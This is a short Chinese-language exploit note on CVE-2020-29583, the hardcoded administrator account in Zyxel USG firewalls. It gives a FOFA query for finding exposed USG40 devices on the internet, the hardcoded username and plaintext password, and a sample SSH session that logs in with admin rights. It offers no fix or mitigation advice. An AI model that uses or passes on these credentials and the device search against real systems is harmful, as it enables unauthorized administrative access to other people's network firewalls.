# Zyxel USG Series 账户硬编码漏洞(CVE-2020-29583)
FOFA:
“`
title=”USG40″
“`
“`bash
Username: zyfwp
Password: PrOw!aN_fXp
“`
该帐户可以同时在SSH和Web界面上使用。
“`bash
$ ssh zyfwp@192.168.1.252
Password: Pr*******Xp
Router> show users current
No: 1
Name: zyfwp
Type: admin
(…)
Router>
“`
ref:
* https://www.eyecontrol.nl/blog/undocumented-user-account-in-zyxel-products.html
* https://twitter.com/dozernz/status/1344435468868358145
* https://forum.ywhack.com/thread-114904-1-1.html
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容